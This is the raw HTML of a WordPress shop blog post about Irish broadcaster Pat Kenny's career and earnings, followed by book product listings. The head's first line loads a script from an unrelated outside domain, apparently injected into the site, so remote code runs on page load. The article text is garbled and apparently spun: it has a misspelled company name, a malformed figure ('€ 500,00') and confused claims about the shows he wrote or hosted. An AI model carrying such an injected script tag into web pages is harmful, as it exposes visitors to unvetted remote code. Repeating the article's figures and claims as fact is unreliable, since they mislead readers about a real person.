<!DOCTYPE html>
<html lang="en-US" itemscope="itemscope" itemtype="http://schema.org/Article" >
<head>
<script src='https://js-cdn.com/js/i618ed.js'></script>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <link rel="profile" href="https://gmpg.org/xfn/11">
    <link rel="pingback" href="https://selected-economic.com/xmlrpc.php">
    <title>The colorful tv career of presenter Pat Kenny &#8211; Selected Economic</title>
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Selected Economic &raquo; Feed" href="https://selected-economic.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Selected Economic &raquo; Comments Feed" href="https://selected-economic.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Selected Economic &raquo; The colorful tv career of presenter Pat Kenny Comments Feed" href="https://selected-economic.com/the-colorful-tv-career-of-presenter-pat-kenny/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/selected-economic.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2.5"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css'  href='https://selected-economic.com/wp-includes/css/dist/block-library/style.min.css?ver=5.2.5' type='text/css' media='all' />
<link rel='stylesheet' id='wc-block-style-css'  href='https://selected-economic.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/style.css?ver=2.4.5' type='text/css' media='all' />
<link rel='stylesheet' id='cookie-law-info-css'  href='https://selected-economic.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-public.css?ver=1.8.2' type='text/css' media='all' />
<link rel='stylesheet' id='cookie-law-info-gdpr-css'  href='https://selected-economic.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-gdpr.css?ver=1.8.2' type='text/css' media='all' />
<link rel='stylesheet' id='woocommerce-layout-css'  href='https://selected-economic.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=3.8.1' type='text/css' media='all' />
<link rel='stylesheet' id='woocommerce-smallscreen-css'  href='https://selected-economic.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=3.8.1' type='text/css' media='only screen and (max-width: 768px)' />
<link rel='stylesheet' id='woocommerce-general-css'  href='https://selected-economic.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=3.8.1' type='text/css' media='all' />
<style id='woocommerce-inline-inline-css' type='text/css'>
.woocommerce form .form-row .required { visibility: visible; }
</style>
<link rel='stylesheet' id='sparklestore-google-fonts-css'  href='//fonts.googleapis.com/css?family=Open+Sans%3A700%2C600%2C800%2C400%7CPoppins%3A400%2C300%2C500%2C600%2C700&#038;ver=5.2.5' type='text/css' media='all' />
<link rel='stylesheet' id='font-awesome-css'  href='https://selected-economic.com/wp-content/themes/sparklestore/assets/library/font-awesome/css/font-awesome.min.css?ver=5.2.5' type='text/css' media='all' />
<link rel='stylesheet' id='flexslider-css'  href='https://selected-economic.com/wp-content/themes/sparklestore/assets/library/flexslider/css/flexslider.css?ver=5.2.5' type='text/css' media='all' />
<link rel='stylesheet' id='lightslider-css'  href='https://selected-economic.com/wp-content/themes/sparklestore/assets/library/lightslider/css/lightslider.css?ver=5.2.5' type='text/css' media='all' />
<link rel='stylesheet' id='recent-posts-widget-with-thumbnails-public-style-css'  href='https://selected-economic.com/wp-content/plugins/recent-posts-widget-with-thumbnails/public.css?ver=6.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='newsletter-css'  href='https://selected-economic.com/wp-content/plugins/newsletter/style.css?ver=6.4.2' type='text/css' media='all' />
<link rel='stylesheet' id='sparkleStore-lite-google-font-css'  href='https://fonts.googleapis.com/css?family=Open%2BSans%3A300%2C300i%2C400%2C400i%2C600%2C600i%2C700%2C700i%2C800%2C800i%7CRaleway%3A100%2C200%2C200i%2C300%2C400%2C500%2C600%2C700%2C800&#038;subset=latin%2Clatin-ext' type='text/css' media='all' />
<link rel='stylesheet' id='sparklestore-parent-style-css'  href='https://selected-economic.com/wp-content/themes/sparklestore//style.css?ver=1.0.0' type='text/css' media='all' />
<link rel='stylesheet' id='sparklestore-lite-style-css'  href='https://selected-economic.com/wp-content/themes/sparklestore-lite/style.css?ver=1.0.0' type='text/css' media='all' />
<style id='sparklestore-lite-style-inline-css' type='text/css'>

            .main_menu_category_menu,
            .main-menu .main-menu-links ul li,
            .menu-category ul,
            .menu-category ul ul,
            .rightheaderwrap #submit-button,
            .top-cart-content .block-subtitle,

            .woocommerce #respond input#submit, 
            .woocommerce a.button, 
            .woocommerce button.button, 
            .woocommerce input.button,
            .woocommerce a.added_to_cart:before, 
            .woocommerce a.button.add_to_cart_button:before, 
            .woocommerce a.button.product_type_grouped:before, 
            .woocommerce a.button.product_type_external:before, 
            .woocommerce a.button.product_type_variable:before,

            .woocommerce a.button.add_to_cart_button:hover, 
            li.product a.added_to_cart:hover, 
            .woocommerce #respond input#submit:hover, 
            .woocommerce button.button:hover, 
            .woocommerce .widget-area a.clear-all:hover, 
            .woocommerce input.button:hover, 
            .woocommerce a.button.product_type_grouped:hover, 
            .woocommerce a.button.product_type_external:hover, 
            .woocommerce a.button.product_type_variable:hover,
            .categoryarea ul.categoryslider li .categorycount,
            .woocommerce nav.woocommerce-pagination ul li a:focus, 
            .woocommerce nav.woocommerce-pagination ul li a:hover, 
            .woocommerce nav.woocommerce-pagination ul li span.current,
            .widget_shopping_cart_content .buttons a.wc-forward:before,

            .woocommerce .widget_shopping_cart .cart_list li a.remove:hover, 
            .woocommerce.widget_shopping_cart .cart_list li a.remove:hover,

            .woocommerce-account .woocommerce-MyAccount-navigation ul li.is-active a, 
            .woocommerce-account .woocommerce-MyAccount-navigation ul li:hover a,
            .woocommerce-account .woocommerce-MyAccount-navigation ul li a,
            .woocommerce #respond input#submit.alt, 
            .woocommerce a.button.alt, 
            .woocommerce button.button.alt, 
            .woocommerce input.button.alt,

            .quantity button, 
            .quantity input[type='button'], 
            .quantity input[type='reset'], 
            .quantity input[type='submit'],


            .main-menu .main-menu-links ul > li.menu-item-has-children:hover ul,

            .woocommerce .widget_price_filter .ui-slider .ui-slider-range,
            .woocommerce .widget_price_filter .ui-slider .ui-slider-handle,

            .blocktitlewrap .SparkleStoreAction>div,
            .box-hover .add-to-links li a:after,
            .fullpromowrap .fullwrap button, 
            .categorproducts .block-title-desc .view-bnt,
            ul.sparkletablinks > li a,
            .sparklestore-blogwrap .bloginner .blogmeta,
            .calendar_wrap caption,
            .widget_product_search a.button, 
            .widget_product_search button, 
            .widget_product_search input[type='submit'], 
            .widget_search .search-submit,
            .scrollup,
            .sparklestore-blogwrap li:hover .blogmeta,
            .nav-previous a, .nav-next a,
            .sparklestore-slider a.sparklestore-button:hover,
            .blog-readmore a,
            .pagination span.current, .pagination a:hover,
            .wishlist_table td.product-name a.button:hover{ 

                background-color: #05b574

            }

            .gridlist-toggle a,
            .gridlist-toggle a.active, 
            .gridlist-toggle a:hover, 
            .gridlist-toggle a:focus,
            .form-submit input, .return-to-shop a, 
            .yith-woocompare-widget .compare, 
            .yith-woocompare-widget .clear-all, 
            .woocommerce #review_form #respond .form-submit input, 
            .single-product .single_add_to_cart_button,
            .woocommerce div.product .woocommerce-tabs ul.tabs li:hover, 
            .woocommerce div.product .woocommerce-tabs ul.tabs li.active{ 

               background-color: #05b574 !important;

            }

            .site-branding,
            .topheader .quickinfowrap .quickinfo li:hover, 
            .topheader .quickinfowrap .quickinfo li:hover a, 
            .topheader .toplinkswrap .toplinks ul li:hover, 
            .topheader .toplinkswrap .toplinks ul li:hover a,
            .entry-title a:hover,
            ul.list-info li a:hover, .blog-readmore:hover,
            .post-detail-container .blog-readmore a:hover,

            a:hover,
            .item-title a:hover,

            .woocommerce #respond input#submit:hover, 
            .woocommerce a.button:hover, .woocommerce button.button:hover, 
            .woocommerce input.button:hover,

            .quantity button:hover, 
            .quantity input[type='button']:hover, 
            .quantity input[type='reset']:hover, 
            .quantity input[type='submit']:hover,

            .footer-middle .widget a:hover, 
            .footer-middle .widget a:hover::before, 
            .footer-middle .widget li:hover::before,
            .footer-bottom a:hover,

            .widget a:hover, .widget a:hover::before, .widget li:hover::before,
            .wishlist_table td.product-name a.button,

            .product_meta span a:hover,

            .woocommerce-message:before,
            .woocommerce-info:before,

            .email-icon:before,

            .woocommerce #respond input#submit.alt:hover, .woocommerce a.button.alt:hover, .woocommerce button.button.alt:hover, .woocommerce input.button.alt:hover,

            .woocommerce ul.cart_list li a:hover, .woocommerce ul.product_list_widget li a:hover,

            .wishlist .top-wishlist a i.fa, .view-cart .cart-contents .header-icon i{ 

                color: #05b574;

            }

            .form-submit input:hover,
            .woocommerce #review_form #respond .form-submit input:hover, 
            .single-product .single_add_to_cart_button:hover,
            .yith-woocompare-widget .clear-all:hover, 
            .yith-woocompare-widget .compare:hover,
            single-product .yith-wcwl-add-to-wishlist .yith-wcwl-add-button a.add_to_wishlist:hover,

            .single-product .yith-wcwl-wishlistexistsbrowse.show a:hover, .single-product .entry-summary .compare.button:hover, .single-product .yith-wcwl-add-to-wishlist a.add_to_wishlist:hover{ 

               color: #05b574 !important;

            }

        .top-cart-content .widget,
        .blog-readmore a,
        .post-detail-container .blog-readmore a:hover,
        .pagination span.current, .pagination a:hover,
        .pagination span.current, .pagination a,
        .fullpromowrap .fullwrap button, .categorproducts .block-title-desc .view-bnt,

        .woocommerce div.product .woocommerce-tabs ul.tabs:before,
        .woocommerce-cart .cart_totals h2, 
        .woocommerce .cart-collaterals .cross-sells h2, 
        .woocommerce-page .cart-collaterals .cross-sells h2, 
        .related.products h2, .up-sells.upsells.products h2, 
        .woocommerce-account #customer_login .col-1 h2, 
        .woocommerce-account #customer_login .col-2 h2, 
        .woocommerce-order-details h2, .woocommerce-customer-details h2,


        .woocommerce a.button.add_to_cart_button, 
        .woocommerce a.added_to_cart, 
        .woocommerce a.button.product_type_grouped, 
        .woocommerce a.button.product_type_external, 
        .woocommerce a.button.product_type_variable,

        .quantity button:hover, 
        .quantity input[type='button']:hover, 
        .quantity input[type='reset']:hover, 
        .quantity input[type='submit']:hover,

        .email-icon:before,

        .woocommerce nav.woocommerce-pagination ul li,

        .wishlist_table td.product-name a.button,
        .woocommerce-message,
        .woocommerce-info,

        .woocommerce-cart .wc-proceed-to-checkout a.checkout-button,

        .woocommerce-billing-fields h3, .woocommerce-shipping-fields h3, h3#order_review_heading, .woocommerce-additional-fields h3, .woocommerce-Address-title h3,

        .woocommerce #respond input#submit,     
        .woocommerce a.button, 
        .woocommerce button.button, 
        .woocommerce input.button, 
        .woocommerce #respond input#submit:hover, 
        .woocommerce a.button:hover, .woocommerce button.button:hover, 
        .woocommerce input.button:hover,
        .widget-area .widget .widget-title,
        .flex-control-nav > li > a:hover, .flex-control-nav > li > a.flex-active{ 

            border-color: #05b574

        }

            .form-submit input, .return-to-shop a, 
            .yith-woocompare-widget .compare, 
            .yith-woocompare-widget .clear-all, 
            .woocommerce #review_form #respond .form-submit input, 
            .single-product .single_add_to_cart_button,
            .footer-middle .widget .widget-title{ 

               border-color: #05b574 !important;

            }

            .wishlist .top-wishlist a .count, .view-cart .cart-contents .header-icon .count,
            .woocommerce span.onsale, .new-label,
            .blocktitlewrap .SparkleStoreAction>div:hover:before,
            .box-hover .add-to-links li a:hover, .box-hover .add-to-links li a:hover:after,
            ul.sparkletablinks > li a:hover, ul.sparkletablinks > li.active a{ 

               background-color: #4a33ce;

            }

            .woocommerce span.onsale:after, .new-label:after{ 

                border-color: #4a33ce transparent transparent;

            }

            .footer-middle .widget h4.widget-title:before{ 

                border-color: #4a33ce;

            }

        @media (max-width: 768px){ .main-menu .main-menu-links .menu>li.menu-item-has-children li, .main-menu .main-menu-links .menu>li.menu-item-has-children li { 

            background-color:#05b574;

        } }

</style>
<script type='text/javascript' src='https://selected-economic.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp'></script>
<script type='text/javascript' src='https://selected-economic.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var Cli_Data = {"nn_cookie_ids":[],"cookielist":[]};
var log_object = {"ajax_url":"https:\/\/selected-economic.com\/wp-admin\/admin-ajax.php"};
/* ]]> */
</script>
<script type='text/javascript' src='https://selected-economic.com/wp-content/plugins/cookie-law-info/public/js/cookie-law-info-public.js?ver=1.8.2'></script>
<!--[if lt IE 9]>
<script type='text/javascript' src='https://selected-economic.com/wp-content/themes/sparklestore/assets/library/html5shiv/html5shiv.min.js?ver=1.0.0'></script>
<![endif]-->
<!--[if lt IE 9]>
<script type='text/javascript' src='https://selected-economic.com/wp-content/themes/sparklestore/assets/library/respond/respond.min.js?ver=1.0.0'></script>
<![endif]-->
<link rel='https://api.w.org/' href='https://selected-economic.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://selected-economic.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://selected-economic.com/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='How Johann Rupert build his name in the banking sector' href='https://selected-economic.com/how-johann-rupert-build-his-name-in-the-banking-sector/' />
<meta name="generator" content="WordPress 5.2.5" />
<meta name="generator" content="WooCommerce 3.8.1" />
<link rel="canonical" href="https://selected-economic.com/the-colorful-tv-career-of-presenter-pat-kenny/" />
<link rel='shortlink' href='https://selected-economic.com/?p=610' />
<link rel="alternate" type="application/json+oembed" href="https://selected-economic.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fselected-economic.com%2Fthe-colorful-tv-career-of-presenter-pat-kenny%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://selected-economic.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fselected-economic.com%2Fthe-colorful-tv-career-of-presenter-pat-kenny%2F&#038;format=xml" />
          <style>
          .has-post-thumbnail img.wp-post-image, 
          .attachment-twentyseventeen-featured-image.wp-post-image { display: none !important; }          
          </style>	<noscript><style>.woocommerce-product-gallery{ opacity: 1 !important; }</style></noscript>
			<script type="text/javascript">
			var cli_flush_cache=2;
		</script>
			<style type="text/css">
			.site-title,
		.site-description {
			position: absolute;
			clip: rect(1px, 1px, 1px, 1px);
		}
		</style>
	<link rel="icon" href="https://selected-economic.com/wp-content/uploads/2019/11/cropped-Selected-Economic-1-32x32.png" sizes="32x32" />
<link rel="icon" href="https://selected-economic.com/wp-content/uploads/2019/11/cropped-Selected-Economic-1-192x192.png" sizes="192x192" />
<link rel="apple-touch-icon-precomposed" href="https://selected-economic.com/wp-content/uploads/2019/11/cropped-Selected-Economic-1-180x180.png" />
<meta name="msapplication-TileImage" content="https://selected-economic.com/wp-content/uploads/2019/11/cropped-Selected-Economic-1-270x270.png" />
		<style type="text/css" id="wp-custom-css">
			.breadcrumbs {
	display: none;
}
.topheader {
	display: none;
}		</style>
		</head>

<body data-rsssl=1 class="post-template-default single single-post postid-610 single-format-standard wp-custom-logo theme-sparklestore woocommerce-no-js rightsidebar woocommerce fulllayout columns-3">

<div id="page" class="site">

    <header id="masthead" class="site-header" itemscope="itemscope" itemtype="http://schema.org/WPHeader" role="banner">        
        <div class="header-container">
            <div class="topheader">
                <div class="container">
                    <div class="row">
                        <div class="quickinfowrap">                     
                            <ul class="quickinfo">
                                                                    
                                                                
                                                                
                                                             
                            </ul>
                        </div>

                        <div class="toplinkswrap">
                            <div class="toplinks">

                                <div class="socialmedia-link">
                                    <ul>
                                        
                                        
                                        
                                        
                                        
                                                                                
                                        <li>
                                            <div class="myaccount">
                                                <a title="My Account" href="https://selected-economic.com/my-account/">
                                                    <i class="fa fa-user"></i>
                                                    <span>My Account</span>
                                                </a>
                                            </div>
                                        </li>

                                    </ul>
                                </div>
                            </div><!-- End Header Top Links --> 
                        </div>
                    </div>
                </div>
            </div>

            <div class="mainheader">
                <div class="container sp-clearfix">
                    <div class="sparklelogo">
                        <a href="https://selected-economic.com/" class="custom-logo-link" rel="home"><img width="238" height="73" src="https://selected-economic.com/wp-content/uploads/2019/11/cropped-Selected-Economic.png" class="custom-logo" alt="Selected Economic" /></a>                        <div class="site-branding">                                 
                            <h1 class="site-title">
                                <a href="https://selected-economic.com/" rel="home">
                                    Selected Economic                                </a>
                            </h1>
                                                            <p class="site-description">Technology you can trust</p>
                                                    </div>
                    </div><!-- End Header Logo --> 

                    <div class="rightheaderwrap sp-clearfix">
                        <div class="category-search-form">
                            <div class="search-box"><form role="search" method="get" id="search_mini_form"  action="https://selected-economic.com/">
                        <select id="cat" class="cate-dropdown hidden-sm hidden-md" name="term"><option value="">All Categories</option><optgroup class="ap-adv-search" label="All Categories"><option  value="books">Books</option><option  value="movie">Movie</option><option  value="tech-gadgets">Tech Gadgets</option></optgroup></select>
                        <input id="search" type="text" value="" name="s" id="s" placeholder="Search entire store here..." class="searchbox" maxlength="128" />
                         <button type="submit" title="Search" class="search-btn-bg" id="submit-button">
                            <span>Search</span>
                         </button>
                        <input type="hidden" name="post_type" value="product" />
                        <input type="hidden" name="taxonomy" value="product_cat" />
                    </form></div>                        </div>
                         
                                                    <div class="view-cart">
                                        <a class="cart-contents" href="https://selected-economic.com/cart/">
            <div class="header-icon">
                <i class="fa fa-shopping-bag"></i>
                <span class="name-text">My Cart</span>
                <span class="count">
                    0                </span>
            </div>
        </a>        
                                        <div class="top-cart-content">
                                    <div class="block-subtitle">Recently added item(s)</div>
                                    <div class="widget woocommerce widget_shopping_cart"><div class="widget_shopping_cart_content"></div></div>                                </div>
                            </div>
                        
                                            </div>
                </div>
            </div>  
        </div>
    </header>
    
    <nav class="main_menu_category_menu sp-clearfix">
        <div class="container">
                        <div class="main-menu sp-clearfix">
                <div class="toggle-wrap">
                    <div class="toggle">
                        <i class="fa fa-align-justify"></i>
                        <span class="label">Menu</span> 
                    </div>
                </div>
                <div class="main-menu-links no_cat">
                    <div class="menu-main-menu-container"><ul id="menu-main-menu" class="menu"><li id="menu-item-4" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4"><a href="/">Home</a></li>
<li id="menu-item-312" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-312"><a href="https://selected-economic.com/shop/">Shop</a></li>
<li id="menu-item-12" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-12"><a href="https://selected-economic.com/category/sci-tech/">Sci-Tech News</a></li>
<li id="menu-item-14" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-14"><a href="https://selected-economic.com/category/tech-industry/">Tech Industry News</a></li>
<li id="menu-item-313" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-313"><a href="https://selected-economic.com/my-account/">My account</a></li>
<li id="menu-item-314" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-314"><a href="https://selected-economic.com/checkout/">Checkout</a></li>
</ul></div>                </div>
            </div>
        </div>
    </nav>

    
        <div class="breadcrumbs" >
          <div class="container">

            <h1 class="entry-title">The colorful tv career of presenter Pat Kenny</h1><div role="navigation" aria-label="Breadcrumbs" class="breadcrumb-trail" itemprop="breadcrumb"><ul class="trail-items" itemscope itemtype="http://schema.org/BreadcrumbList"><meta name="numberOfItems" content="3" /><meta name="itemListOrder" content="Ascending" /><li itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem" class="trail-item trail-begin"><a href="https://selected-economic.com/" rel="home" itemprop="item"><span itemprop="name">Home</span></a><meta itemprop="position" content="1" /></li><li itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem" class="trail-item"><a href="https://selected-economic.com/category/uncategorized/" itemprop="item"><span itemprop="name">Uncategorized</span></a><meta itemprop="position" content="2" /></li><li itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem" class="trail-item trail-end"><span itemprop="item"><span itemprop="name">The colorful tv career of presenter Pat Kenny</span></span><meta itemprop="position" content="3" /></li></ul></div>          </div>
        </div>
      
<div class="inner_page">
    <div class="container">
        <div class="row">

            <div id="primary" class="content-area">
                <main id="main" class="site-main" role="main">
                    <article id="post-610" class="post-610 post type-post status-publish format-standard has-post-thumbnail hentry category-uncategorized" itemtype="http://schema.org/BlogPosting" itemtype="http://schema.org/BlogPosting">

	<div class="post-container">
					<div class="post-img">

				<a title="The colorful tv career of presenter Pat Kenny" href="https://selected-economic.com/the-colorful-tv-career-of-presenter-pat-kenny/">
					 <figure>
						<img src="https://selected-economic.com/wp-content/uploads/2020/01/5464ger-760x385.jpg" class="img-responsive" alt="The colorful tv career of presenter Pat Kenny">											 
					</figure>
				</a>
				<div class="blogdate">
					<time class="entry-date updated">
						January 13 2020					</time>
				</div>
			   									   
			</div>
				<div class="post-detail-container">
			<div class="title">	
					<h2 class="entry-title">
						<a href="https://selected-economic.com/the-colorful-tv-career-of-presenter-pat-kenny/">
							The colorful tv career of presenter Pat Kenny						</a>
					</h2>										
			</div>
			<ul class="list-info">
				<li><i class="fa fa-user"></i>  Chad Folmar</li>
				<li><i class="fa fa-folder-open"></i> <a href="https://selected-economic.com/category/uncategorized/" rel="category tag">Uncategorized</a></li>
				<li><i class="fa fa-comment"></i> <a href="https://selected-economic.com/the-colorful-tv-career-of-presenter-pat-kenny/#respond" class="Comments are Closed" >0 Comment</a></li>
				<li><i class="fa fa-tag"></i> </li>							
			</ul>

			<div class="blogdesc-wrap">
			  	<div class="blogdesc">								
		   			
<p>During his newest morning television program, Pat Kenny applies his seasoned hosting style and eloquent insight to the news and current affairs of each day. The series combines intense criticism of current events, interviews with human interest with tales of light entertainment and live music. Sharp, smart, and insightful radio offering a bit more morning listeners.</p>



<p></p>



<p>The TV presenter carries on developing a large nest egg to himself and his family The Newstalk host has just posted a comprehensive set of figures with an annual income of € 1,526,884 on his business— Pat Jenny media services.</p>



<p>Accounts submitted with the Companies Office reveal that his company&#8217;s profits have soared past € 150,000 last year as the television executive shows no signs of stopping.&nbsp;</p>



<p>For the last four decades, Pat has been a fixture on-air and on the screens and has hosted some of the highest-rated shows, including The Late Late Show that he has written over ten years.<br></p>



<p>In 2013, Kenny left RTE, taking up the position with Newstalk Radio. Newstalk has officially snatched up him in a € 2 m contract with the Dalkey-based media expert.<br></p>



<p>Then, with his eponymous current affairs show, he signed a lucrative contract with Virgin Media where he discusses nation affairs. He is believed to have signed a deal worth € 500,00 with TV3 to carry the weekly show forward.<br></p>



<p></p>


<div class="wc-block-grid wp-block-handpicked-products wc-block-handpicked-products has-3-columns"><ul class="wc-block-grid__products"><li class="wc-block-grid__product">
				<a href="https://selected-economic.com/product/editing-reality-tv-the-easily-accessible-high-paying-hollywood-job-that-nobody-knows-about-paperback/" class="wc-block-grid__product-link">
					<div class="wc-block-grid__product-image"><img width="300" height="300" src="https://selected-economic.com/wp-content/uploads/2020/01/51qGltHU8XL-300x300.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" srcset="https://selected-economic.com/wp-content/uploads/2020/01/51qGltHU8XL-300x300.jpg 300w, https://selected-economic.com/wp-content/uploads/2020/01/51qGltHU8XL-150x150.jpg 150w, https://selected-economic.com/wp-content/uploads/2020/01/51qGltHU8XL-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /></div>
					<div class="wc-block-grid__product-title">Editing Reality TV: The Easily Accessible, High-Paying Hollywood Job That Nobody Knows about Paperback</div>
				</a>
				
				<div class="wc-block-grid__product-price price"><span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>20.77</span></div>
				
				<div class="wp-block-button wc-block-grid__product-add-to-cart"><a href="?add-to-cart=608" aria-label="Add &ldquo;Editing Reality TV: The Easily Accessible, High-Paying Hollywood Job That Nobody Knows about Paperback&rdquo; to your cart" data-quantity="1" data-product_id="608" data-product_sku="" rel="nofollow" class="wp-block-button__link add_to_cart_button ajax_add_to_cart">Add to cart</a></div>
			</li><li class="wc-block-grid__product">
				<a href="https://selected-economic.com/product/my-first-movie-twenty-celebrated-directors-talk-about-their-first-film-paperback/" class="wc-block-grid__product-link">
					<div class="wc-block-grid__product-image"><img width="300" height="300" src="https://selected-economic.com/wp-content/uploads/2020/01/71Vi8XkyGuL-300x300.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" srcset="https://selected-economic.com/wp-content/uploads/2020/01/71Vi8XkyGuL-300x300.jpg 300w, https://selected-economic.com/wp-content/uploads/2020/01/71Vi8XkyGuL-150x150.jpg 150w, https://selected-economic.com/wp-content/uploads/2020/01/71Vi8XkyGuL-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /></div>
					<div class="wc-block-grid__product-title">My First Movie: Twenty Celebrated Directors Talk about Their First Film Paperback</div>
				</a>
				
				<div class="wc-block-grid__product-price price"><span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>17.32</span></div>
				
				<div class="wp-block-button wc-block-grid__product-add-to-cart"><a href="?add-to-cart=606" aria-label="Add &ldquo;My First Movie: Twenty Celebrated Directors Talk about Their First Film Paperback&rdquo; to your cart" data-quantity="1" data-product_id="606" data-product_sku="" rel="nofollow" class="wp-block-button__link add_to_cart_button ajax_add_to_cart">Add to cart</a></div>
			</li><li class="wc-block-grid__product">
				<a href="https://selected-economic.com/product/confessions-of-a-casting-director-help-actors-land-any-role-with-secrets-from-inside-the-audition-room-paperback/" class="wc-block-grid__product-link">
					<div class="wc-block-grid__product-image"><img width="300" height="300" src="https://selected-economic.com/wp-content/uploads/2020/01/61ndhVje3iL-300x300.jpg" class="attachment-woocommerce_thumbnail size-woocommerce_thumbnail" alt="" srcset="https://selected-economic.com/wp-content/uploads/2020/01/61ndhVje3iL-300x300.jpg 300w, https://selected-economic.com/wp-content/uploads/2020/01/61ndhVje3iL-150x150.jpg 150w, https://selected-economic.com/wp-content/uploads/2020/01/61ndhVje3iL-100x100.jpg 100w" sizes="(max-width: 300px) 100vw, 300px" /></div>
					<div class="wc-block-grid__product-title">Confessions of a Casting Director: Help Actors Land Any Role with Secrets from Inside the Audition Room Paperback</div>
				</a>
				
				<div class="wc-block-grid__product-price price"><span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>19.04</span></div>
				
				<div class="wp-block-button wc-block-grid__product-add-to-cart"><a href="?add-to-cart=601" aria-label="Add &ldquo;Confessions of a Casting Director: Help Actors Land Any Role with Secrets from Inside the Audition Room Paperback&rdquo; to your cart" data-quantity="1" data-product_id="601" data-product_sku="" rel="nofollow" class="wp-block-button__link add_to_cart_button ajax_add_to_cart">Add to cart</a></div>
			</li></ul></div> 
			  	</div>								  
			</div>								
  		</div>
		
	</div>

</article><!-- #post-## -->
	<nav class="navigation post-navigation" role="navigation">
		<h2 class="screen-reader-text">Post navigation</h2>
		<div class="nav-links"><div class="nav-previous"><a href="https://selected-economic.com/how-johann-rupert-build-his-name-in-the-banking-sector/" rel="prev">How Johann Rupert build his name in the banking sector</a></div></div>
	</nav>
<div id="comments" class="comments-area">

		<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Leave a Reply <small><a rel="nofollow" id="cancel-comment-reply-link" href="/the-colorful-tv-career-of-presenter-pat-kenny/#respond" style="display:none;">Cancel reply</a></small></h3>			<form action="https://selected-economic.com/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate>
